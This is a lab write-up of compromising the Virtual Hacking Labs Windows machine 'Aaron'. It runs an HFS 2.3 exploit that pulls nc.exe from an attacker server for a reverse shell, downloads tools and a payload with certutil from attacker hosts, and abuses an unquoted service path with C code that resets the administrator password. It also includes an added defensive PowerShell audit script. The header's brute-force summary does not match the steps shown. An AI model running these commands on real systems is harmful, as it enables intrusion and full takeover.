
VHL — Aaron

Windows 10 Enterprise with SMB and RDP exposed. Credential brute-force via SMB leads to remote code execution and full system access.

February 11, 2025, Virtual Hacking Labs
Tags: SMB, RDP, Brute Force, Windows 10

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 23:00 EST
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 45.45% done; ETC: 23:02 (0:00:59 remaining)
Nmap scan report for 10.11.1.27
Host is up (0.022s latency).
Not shown: 59536 closed tcp ports (reset), 5988 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 10 Enterprise Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: AARON
|   NetBIOS_Domain_Name: AARON
|   NetBIOS_Computer_Name: AARON
|   DNS_Domain_Name: Aaron
|   DNS_Computer_Name: Aaron
|   Product_Version: 10.0.14393
|_  System_Time: 2025-02-11T04:01:50+00:00
|_ssl-date: 2025-02-11T04:01:59+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=Aaron
| Not valid before: 2025-02-10T02:59:38
|_Not valid after:  2025-08-12T02:59:38
8080/tcp  open  http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=135%CT=1%CU=31355%PV=Y%DS=2%DC=I%G=Y%TM=67A
OS:ACBB5%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=I%TS=A)SEQ(SP=10
OS:3%GCD=3%ISR=10B%TI=I%TS=A)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NN
OS:T11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=200
OS:0%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)
OS:T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Network Distance: 2 hops
Service Info: Host: AARON; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-11T04:01:50
|_  start_date: 2025-02-11T02:59:39
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h36m02s, deviation: 3h34m40s, median: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 10 Enterprise Evaluation 14393 (Windows 10 Enterprise Evaluation 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Aaron
|   NetBIOS computer name: AARON\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-02-10T20:01:52-08:00

TRACEROUTE
HOP RTT      ADDRESS
1   21.94 ms 10.11.1.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.53 seconds
```

rpcclient

```sh
rpcclient -U "" 10.11.1.27
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
```

```sh
samrdump.py 10.11.1.27
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Retrieving endpoint list from 10.11.1.27
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[*] No entries received.
```

445 (SMB)

```sh
445/tcp   open  microsoft-ds  Windows 10 Enterprise Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)
```

```sh
smbclient -N -L \\\\10.11.1.27
session setup failed: NT_STATUS_ACCESS_DENIED

smbclient -N -L \\\\10.11.1.27 -U 'Guest'
session setup failed: NT_STATUS_LOGON_FAILURE
```

8080 (HFS)

```sh
8080/tcp  open  http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
```

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)

  • https://www.exploit-db.com/exploits/39161

  • modified the exploit payload so that it pulls nc.exe from port 8000 instead of 80 (the reverse-shell listener runs on port 80)

  • host nc.exe

```sh
python3 -m http.server 8000
```

  • trigger execution

```sh
python2 39161.py 10.11.1.27 8080
```

```sh
nc -lnvp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.27] 49725
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Aaron\Desktop>whoami
whoami
aaron\aaron
```

privilege escalation

```sh
C:\Users\Aaron>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\Aaron>systeminfo
systeminfo

Host Name:                 AARON
OS Name:                   Microsoft Windows 10 Enterprise Evaluation
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00329-20000-00001-AA589
Original Install Date:     10/15/2016, 8:10:27 PM
System Boot Time:          2/10/2025, 8:13:11 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,485 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 2,539 MB
Virtual Memory: In Use:    660 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\AARON
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.11.1.27
                                 [02]: fe80::8d62:50ab:edf2:4711
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```

winpeas

```cmd
certutil.exe -f -urlcache -split http://172.16.1.1:8000/winPEASx64.exe winPEASx64.exe
```

```cmd
╔══════════╣ Interesting Services -non Microsoft-
╚ Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
    VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running
    Alias Manager and Ticket Service
   =================================================================================================

    VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running
    Provides support for synchronizing objects between the host and guest operating systems.
   =================================================================================================

    WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
    File Permissions: Users [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Users [WriteData/CreateFiles])
    In order to optimize system performance,Wise Care 365 will calculate your system startup time.
   =================================================================================================
```

sharpup

```cmd
certutil.exe -f -urlcache -split http://172.16.1.1:8000/SharpUp.exe SharpUp.exe
```

```cmd
C:\Users\Aaron>.\SharpUp.exe audit
.\SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
Registry AutoLogon Found

[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileSyncShell64.dll
[+] Associated Process is explorer with PID 3124 
[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\MSVCP120.dll
[+] Associated Process is explorer with PID 3124 
[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\MSVCR120.dll
[+] Associated Process is explorer with PID 3124 
[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
[+] Associated Process is explorer with PID 3124 

=== Registry AutoLogons ===
	DefaultDomainName: AARON
	DefaultUserName: Aaron
	DefaultPassword: 
	AltDefaultDomainName: 
	AltDefaultUserName: 
	AltDefaultPassword: 


=== Services with Unquoted Paths ===
	Service 'WiseBootAssistant' (StartMode: Automatic) has executable 'C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe', but 'C:\Program Files (x86)\Wise\Wise' is modifable.
	Service 'WiseBootAssistant' (StartMode: Automatic) has executable 'C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe', but 'C:\Program Files (x86)\Wise\Wise Care' is modifable.


=== Modifiable Service Binaries ===
	Service 'WiseBootAssistant' (State: Running, StartMode: Auto) : C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe

[*] Completed Privesc Checks in 2 seconds
```
```cmd
C:\Users\Aaron\Desktop>sc qc WiseBootAssistant
sc qc WiseBootAssistant
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WiseBootAssistant
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Wise Boot Assistant
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem
```
```cmd
certutil.exe -f -urlcache -split http://172.16.1.1:8000/accesschk.exe accesschk.exe
```

```cmd
C:\Users\Aaron\Desktop>.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq C:\

Accesschk v6.13 - Reports effective permissions for securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\
  RW BUILTIN\Administrators
  RW NT AUTHORITY\SYSTEM
   W NT AUTHORITY\Authenticated Users
  RW NT SERVICE\TrustedInstaller
```

```cmd
C:\Users\Aaron\Desktop>.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)"
.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)"

Accesschk v6.13 - Reports effective permissions for securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
```
  • place the executable in C:\Program Files (x86)\Wise, because that is the directory on the unquoted path where Aaron (as a member of BUILTIN\Users) has write access
```cmd
C:\Users\Aaron\Desktop>.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Wise"
.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Wise"

Accesschk v6.13 - Reports effective permissions for securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\Wise
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
```
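SharpUp and accesschk established the two conditions by hand: a service path with spaces and no quotes, and a directory on that path writable by ordinary users. The PowerShell audit script below is an added example, not part of this writeup or of SharpUp; it performs both checks across every service, derives the same candidate paths the service control manager probes, and with `-Fix` quotes the path through the Win32_Service `Change` method. The principal names and the write-rights bitmask are assumptions for a default English Windows install.

```powershell
# Added audit script, not from the writeup: flags services whose unquoted ImagePath
# contains spaces and whose probed parent folder is writable by low-privileged users.
# Run from an elevated prompt so every ACL can be read. -Fix quotes the path in place.
param([switch]$Fix)

# Assumed list of principals that ordinary users belong to (English Windows names).
$weak = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone',
          'NT AUTHORITY\INTERACTIVE')
# Rights that allow dropping a file: WriteData/CreateFiles, GENERIC_WRITE, GENERIC_ALL.
$writeBits = 0x1 -bor 0x40000000 -bor 0x10000000

function Test-WeakWriteAccess([string]$Dir) {
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Dir -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        # Inherit-only ACEs apply to children, not to the folder itself.
        $inheritOnly = $ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)
        if ($ace.AccessControlType -ne 'Allow' -or $inheritOnly) { continue }
        if ($ace.IdentityReference.Value -notin $weak) { continue }
        if (([int]$ace.FileSystemRights -band $writeBits) -ne 0) { return $true }
    }
    return $false
}

foreach ($svc in Get-CimInstance Win32_Service) {
    $path = $svc.PathName
    if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { continue }
    # Separate the executable from its arguments; a path without spaces is not affected.
    $exe = if ($path -match '^(?<exe>.*?\.exe)') { $Matches.exe } else { $path }
    if ($exe -notmatch ' ') { continue }
    $svcArgs = $path.Substring($exe.Length)
    # The service control manager tries "C:\Program.exe", "C:\Program Files.exe", ...
    # in order before reaching the real binary; each shorter candidate is a hijack point.
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
        $dir = Split-Path -LiteralPath $candidate -Parent
        if (Test-WeakWriteAccess $dir) {
            "$($svc.Name) (runs as $($svc.StartName)): $dir is writable by low-privileged users, $candidate would run instead"
        }
    }
    if ($Fix) {
        $r = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = "`"$exe`"$svcArgs" }
        "Quoted path for $($svc.Name): ReturnValue=$($r.ReturnValue)"
    }
}
```

On this host the script would report WiseBootAssistant with C:\Program Files (x86)\Wise as the writable directory and C:\Program Files (x86)\Wise\Wise.exe as the candidate, matching the SharpUp and accesschk output above; the permission on that folder still needs tightening separately.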

Wise.c

```c
#include <stdlib.h>

/* Placed as "C:\Program Files (x86)\Wise\Wise.exe": the service control manager
 * resolves the unquoted path of WiseBootAssistant by trying that name before the
 * real BootTime.exe, so this runs as LocalSystem when the service starts. */
int main(void)
{
    /* Set the local administrator password; system() returns the command's exit status. */
    int status = system("net user administrator Password123");

    return status == 0 ? 0 : 1;
}
```
```sh
x86_64-w64-mingw32-gcc Wise.c -o Wise.exe
```

```cmd
certutil.exe -f -urlcache -split http://172.16.1.2:8000/Wise.exe Wise.exe
```

```cmd
cd "C:\Program Files (x86)\Wise"
```

```cmd
C:\Program Files (x86)\Wise>copy C:\users\aaron\Wise.exe .\
copy C:\users\aaron\Wise.exe .\
        1 file(s) copied.
```

```cmd
shutdown /r /t 0
```

```sh
nxc smb 10.11.1.27 -u administrator -p 'Password123' --local-auth
SMB         10.11.1.27      445    AARON            [*] Windows 10 Enterprise Evaluation 14393 x64 (name:AARON) (domain:AARON) (signing:False) (SMBv1:True)
SMB         10.11.1.27      445    AARON            [+] AARON\administrator:Password123 (Pwn3d!)
```

```sh
impacket-psexec administrator:'Password123'@10.11.1.27
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.11.1.27.....
[*] Found writable share ADMIN$
[*] Uploading file TjYnMxrV.exe
[*] Opening SVCManager on 10.11.1.27.....
[*] Creating service pAxK on 10.11.1.27.....
[*] Starting service pAxK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\users\administrator\desktop\key.txt
ibvsojxhcqkvdwvvezvi
C:\Windows\system32> date
The current date is: Tue 02/11/2025
```